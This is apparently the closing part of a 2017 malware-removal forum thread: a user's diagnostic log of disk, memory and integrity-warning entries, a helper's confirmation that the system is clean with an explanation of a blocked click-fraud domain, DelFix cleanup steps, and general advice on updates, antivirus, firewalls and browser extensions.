  Date: 2017-11-12 17:02:26.587
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-11-10 18:37:59.829
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-11-10 16:13:01.346
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-11-04 08:01:02.085
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-30 14:59:34.980
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2017-10-30 00:33:27.890
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Percentage of memory in use: 21%
Total physical RAM: 8108.94 MB
Available physical RAM: 6359.21 MB
Total Virtual: 16300.94 MB
Available Virtual: 14711.77 MB

==================== Drives ================================

Drive c: (OS) (Fixed) (Total:919.74 GB) (Free:802.62 GB) NTFS
Drive e: () (Removable) (Total:15.02 GB) (Free:15.02 GB) FAT32
Drive f: (Seagate Slim Drive) (Fixed) (Total:465.76 GB) (Free:454.05 GB) NTFS
Drive g: (KINGSTON) (Removable) (Total:14.89 GB) (Free:13.24 GB) FAT32

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 931.5 GB) (Disk ID: 5641807B)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Active) - (Size=11.7 GB) - (Type=27)
Partition 3: (Not Active) - (Size=919.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: 19D43B3F)
Partition 1: (Active) - (Size=465.8 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (MBR Code: Windows XP) (Size: 14.9 GB) (Disk ID: C3072E18)
Partition 1: (Active) - (Size=14.9 GB) - (Type=0C)
 Could not read MBR for disk 3.

==================== End of Addition.txt ============================


Your logs look clean to me :)

Quote

Also, I am curious about n65adserv.com.  What would have happened if this outbound file had not been blocked?

Basically your system would be part of a clicking fraud campaign, helping generate revenue for cybercriminals.

Since there are no signs of infection anymore in your logs, and you just told me that there are no more issues left to address, I guess we're done here. We'll wrap it up by running DelFix to delete the tools and logs that were used in this clean-up.

DelFix
Follow the instructions below to download and execute DelFix.

  • Download DelFix and move the executable to your Desktop
  • Right-click on DelFix.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Check the following options :
    • Activate UAC
    • Remove disinfection tools
    • Create registry backup
    • Purge system restore
    • Reset system settings
  • Once all the options mentioned above are checked, click on Run
  • After DelFix is done running, a log will open. Please copy/paste the content of the output log in your next reply

Tips, tricks, advice and recommendations

Now it's time to give you some tips, tricks, advice and recommendations on how to protect your system and prevent you from being infected in the future. This is where I'll explain basic security measures that you should take to protect and harden your system, and also make sure it stays as safe and secure as possible against hackers and malware. You are free to ignore the recommendations listed below, although I obviously do not recommend it. If you have any questions about one of the points covered in the speech below, feel free to ask me your questions here directly so I can answer them and guide you.

Windows Updates

Keeping Windows up to date is one of the first steps in having a safe and secure system. The Security Updates that Windows receives are meant to fix exploits and flaws in it, which makes it more secure and not exploitable by hackers. In order to do that, you should always install the Security Updates, known as "Important Updates" on your Windows system. These updates are released on the second Tuesday of every month, but some are also released before if they are emergency/critical Security Updates. Let's make sure that you have all your Important Updates and Recommended Updates installed and that your Windows Updates are set to be installed automatically.

Keeping your programs up-to-date

Like keeping Windows updated, keeping your installed programs up-to-date is another important step in having a safe and secure system. Outdated programs can be exploited by hackers and malware to infect a system and take it over. This is especially true today with the rise of Exploit Kits (and also 0-days) which are one of the biggest attack vectors to distribute malware. Therefore, you should always keep vulnerable programs like Adobe Flash Player, Adobe Shockwave Player, Java, Silverlight, Google Chrome, Mozilla Firefox, VLC Media Player, etc. updated to their most recent version (even better, you don't have to install them if you don't use them). Programs like UCheck, SecuniaPSI and Heimdal Free will scan your system for outdated programs, and help you identify them, as well as update them.

Anti-Virus

Note: The programs listed below are all free to use or they have some sort of trial. Some of them have a paid version that provides more features, while a lot of other good programs only have a paid version but aren't listed there (such as Kaspersky and ESET Antivirus products).

Anti-Malware, Anti-Exploit and Anti-Ransomware

Having a decent security setup (which also includes an Antivirus) is the most crucial step to protect a system. These programs are additional layers of defence that will prevent a system from being infected, or if it somehow ends up infected, help mitigate the infection and remediate it. Fortunately, the new Malwarebytes 3 bundles all these layers in one, easy to use and efficient product. Malwarebytes 3 offers Malware, Web, Exploit and Ransomware protection modules that work together in order to keep your system protected and stop an infection at multiple levels.

  • Malwarebytes - Comes with a free trial of the Premium version for 14 days, after which it reverts back to the Free version

Note: Please note that only the Premium version of Malwarebytes 3 offers real-time protection (Malware, Web, Exploit and Ransomware). The free version only allows you to scan your system for threats and remove them.

Firewall

Starting in Windows Vista, the Windows Firewall greatly improved and will satisfy the needs of most users. If you do not have an Internet Suite Antivirus program (which includes a firewall) and you want to use a 3rd party firewall, you can consider the options below.

  • GlassWire - Has both a free and paid version (with different packages)
  • Windows Firewall Control - Gives you more control over your Windows Firewall
  • TinyWall - Lightweight firewall implementing the Windows Firewall and giving you more control over it

Web Browsers and Web Browsing

Web Browsers could be considered as the closest door between a malware and your system. This is where most malware goes through to infect a system, and therefore it should be the program(s) you want to secure the most. There are two ways of going about it: hardening your web browser via extensions, and having good browsing habits. 

Hardening your web browser means to install extensions that will help it protect itself (and your system on the same occasion) against Exploit Kits, MiTM attacks, etc. but also you at the same time. Here are a few extensions that I recommend you to install.

  • uBlock Origin: Efficient multi-purpose blocker that is lightweight on RAM and CPU usage (Google Chrome, Mozilla Firefox, Microsoft Edge, Opera and most Chromium and Firefox-based browsers)
  • HTTPS Everywhere: Extension that converts your HTTP (unencrypted) requests to HTTPS (encrypted) ones (Google Chrome, Mozilla Firefox and Opera)
  • Web of Trust: Website reputation, rating and review extension that will help you quickly identify bad and suspicious sites from good ones (every web browser)
  • NoScript: NoScript is a script blocker (Java, Flash, JavaScript, etc.) for Mozilla Firefox and Firefox-based browsers (Mozilla Firefox and Firefox-based web browsers)
  • uMatrix: For advanced users, a point and click matrix-like extension that allows you to control requests done on a webpage (based on source, destination and type) (Google Chrome, Mozilla Firefox and Opera)
  • LastPass: Secure password manager allowing you to create, manage, and use passwords you save in your LastPass account (every web browser)

As for safe browsing habits, you can find tons of guides, tutorials, articles, etc. online that will highlight the basics you need to follow (only visit websites you trust, do not click on ads, do not download files from untrusted sources, use a password manager, always verify the URL of a website and make sure it's correctly typed, etc.), and even what you can do if you want to take it a step further (create a fake email address for spam emails, browse the web in a privacy mode, etc.). Here are a few:


As you can see, there are plenty of resources out there. Simply Googling "good browsing habits" or "safe browsing habits" should allow you to find a lot of them.

Other recommendations

Even if you follow every recommendation that I listed here, in the end, it's also your job to be careful when browsing the web and downloading files if you don't want to get infected. Therefore, if you use your brain (common sense) when browsing the web, downloading programs and files, etc., you have far fewer chances of getting infected by malware. If for example you're not sure if a website is legitimate or not, or if a file is safe to download and execute, or if a program looks "too good" to be free, I suggest you avoid going to that website, downloading that file or using that program.

Here are a few guides, tutorials, articles, etc. that you could read in order to learn more about computer protection and security to improve your current computer protection setup but also improve your good web browsing and computer usage practices :


The End!

And that's it! Now that you know more about how to protect your computer and secure it, you're good to go back to your online activities, but in a safe and secure way! You are also free to stay on the forums and ask for help in different topics if you ever need to. Just make sure that you post your question/issue in the right section to get the best assistance possible. And if you ever get infected again (which I hope you won't!), you can always come back in this section to get another checkup with one of our trained malware removal members.

Do you have any questions before I close this thread? :)


Glad we could help. :) If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Thanks!
